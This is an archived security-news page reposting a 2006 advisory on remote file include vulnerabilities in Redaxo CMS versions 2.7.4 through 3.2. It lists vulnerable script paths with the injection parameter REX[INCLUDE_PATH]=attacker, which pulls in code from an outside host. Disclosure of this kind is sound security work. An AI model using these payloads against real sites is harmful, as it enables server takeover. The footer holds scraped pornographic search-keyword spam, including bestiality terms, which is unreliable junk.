about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities




2006-06-02 Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities 
Rated as : High Risk

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 2.7.4

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker

securitydot.net - 2006-06-02

Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 10:41:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xxlx.com www.meeraj ww.hotsex. kari sweet Womenssex desiba.com 200 /compo Phonerotic kari sweet .ad tgirl Zoo sex sixsy vide www.sexwie WWW.XXX VE POP3d Www.World+ ms05-052 Pinkworld. news for c bigtittes www.meeraj kari sweet WWW.INDEAN doohdwali. tamel hot cart.asp sign in auditio directory sign in Www.pornov amateur. sign in t72t zapatube t745t lezbieen www.jp18. bangbros p ANIMAL FUC mysex horse fuck black nake tamel hot YOUNG SHAV pocket ie WWW.BBC UR kaspersky hindisexst